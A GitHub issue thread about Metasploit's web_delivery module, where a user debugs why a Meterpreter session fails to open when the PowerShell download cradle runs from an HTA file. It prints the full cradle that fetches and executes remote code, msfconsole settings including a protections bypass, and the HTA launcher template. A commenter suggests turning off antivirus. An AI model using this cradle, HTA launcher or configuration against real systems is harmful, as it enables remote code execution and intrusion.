### ISSUE TITLE
MSF resets session in web delivery https on connect if powershell one liner is executed from an HTA

### ISSUE THREAD

**Issue by russokiwi** [rapid7/metasploit-framework#14760]
## Steps to reproduce

How'd you do it?

Running from command line (although the string is encoded): 

powershell.exe -nop -w hidden -c [Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;$H=new-object net.webclient;if([System.Net.WebProxy]::GetDefaultProxy().address -ne $null){$H.proxy=[Net.WebRequest]::GetSystemWebProxy();$H.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;};IEX ((new-object Net.WebClient).DownloadString('http://someDNSname/removed1'))

from command line returns the shell fine - like this:

[*] 172.17.0.1       web_delivery - Powershell command length: 3524
[*] 172.17.0.1       web_delivery - Delivering Payload (3524 bytes)
[*] https://someDNSname:443/msh2 handling request from 172.17.0.1; (UUID: 2f2q5opk) Encoded stage with x64/xor_dynamic
[*] https://someDNSname:443/msh2 handling request from 172.17.0.1; (UUID: 2f2q5opk) Staging x64 payload (202061 bytes) ...
[*] Meterpreter session 13 opened (172.17.0.2:443 -> 172.17.0.1:37664) at 2021-02-15 17:00:01 +0000

If I run the same command (although encoded) embedded in an HTA, I get:

[*] 172.17.0.1       web_delivery - Powershell command length: 3512
[*] 172.17.0.1       web_delivery - Delivering Payload (3512 bytes)

and then nothing...

msfconsole is running in docker;

msfconsole options::

```
use multi/script/web_delivery
set payload windows/x64/meterpreter/reverse_https
set PSH-EncodedCommand true
set PrependMigrate false
set EnableStageEncoding true
set SRVHOST 0.0.0.0
set SRVPORT 80
set LHOST someDNSname
set LPORT 443
set URIPATH /path1
set LURI /path2
set PrependMigrate false
set Powershell::prepend_protections_bypass true
set TARGET 2
set HandlerSSLCert /somefolder/google.pem
set SSL false
set Powershell::remove_comspec true
set StagerVerifySSLCert true
set enablestageencoding true
set autoloadstdapi true
set autoverifysession true
set exitonsession false
run -j -z
```

HTA is:

```
<html>
<head>
<HTA:APPLICATION id="hwHTA"
applicationName="hyperHTA"
border="thin"
borderStyle="normal"
caption="yes"
maximizeButton="yes"
minimizeButton="yes"
showInTaskbar="no"
windowState="normal"
innerBorder="yes"
navigable="yes"
scroll="auto"
scrollFlat="yes"
singleInstance="yes" 
sysMenu="yes"
contextMenu="yes"
selection="yes" 
version="1.0" />
<script>
a=new ActiveXObject("WScript.Shell");
a.run("download cradle generated by msf goes here",0,false);window.close();
</script
```

Versions:

Framework: 6.0.31-dev
Console  : 6.0.31-dev
Windows 10.19042 - defender off / no av

Thanks very much!

**Comment by hello-lab** [comment]
try turning off the live scan feature of windows defender/any antivirus it worked for me
note; im using kali linux
